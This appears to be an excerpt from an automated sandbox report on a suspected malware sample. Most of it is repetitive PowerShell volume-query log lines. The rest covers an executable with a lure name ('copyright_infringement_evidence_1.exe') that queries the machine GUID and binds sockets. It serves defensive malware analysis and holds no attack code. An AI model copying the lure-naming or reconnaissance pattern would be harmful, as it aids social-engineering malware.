Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CC7CC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF7A18CC7CC
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents Jump to behavior
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18B6DF0 getsockname,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00007FF7A18B6DF0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18740C0 bind, 0_2_00007FF7A18740C0
Legend of the report's IP chart (buckets by share of IPs): < 25%; 25% to 50%; 50% to 75%; > 75%.